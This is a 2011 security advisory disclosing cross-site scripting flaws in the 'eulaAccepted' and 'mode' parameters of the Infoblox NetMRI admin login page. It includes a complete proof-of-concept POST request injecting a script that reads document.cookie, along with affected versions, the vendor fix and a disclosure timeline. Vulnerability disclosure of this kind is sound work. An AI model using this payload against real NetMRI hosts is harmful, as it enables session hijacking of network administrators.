============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-004
Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 Multiple Cross Site Scripting - XSS (prior versions have not been checked but could be vulnerable too).
Infoblox NetMRI is a network automation solution for configuration, optimization and compliance enforcement. With hundreds of built-in rules and industry best practices, it automates network change, intelligently manages device configurations and reduces the risk of human error.
Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 presents multiple Cross-Site Scripting vulnerabilities on its "eulaAccepted" and "mode" parameters in the admin login page, due to an insufficient sanitization on user supplied data and encoding output.
A malicious user could perform session hijacking or phishing attacks.
POST /netmri/config/userAdmin/login.tdf HTTP/1.1
Content-Length: 691
Cookie: XXXX
Host: netmrihost:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.14322)
formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false
An attacker could perform session hijacking or phishing attacks.
Infoblox NetMRI 6.2.1 (latest), 6.1.2 and 6.0.2 branches (prior versions have not been checked but could be vulnerable too).
Vulnerability fixed on 6.2.2 version - available as of 10 Nov 2011
Also the following security patches are available:
http://www.infoblox.com/en/products/netmri.html
http://www.foregroundsecurity.com/
http://www.painsec.com
This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com).
August 28, 2011: Vulnerability discovered by Jose Carlos de Arriba.
August 28, 2011: Vendor contacted by email.
August 29: Vendor response asking for details.
September 21, 2011: Security advisory sent to vendor.
November 10, 2011: Security Fix released by vendor.
November 10, 2011: Security advisory released.
The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwise.
Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba (at) foregroundsecurity (dot) com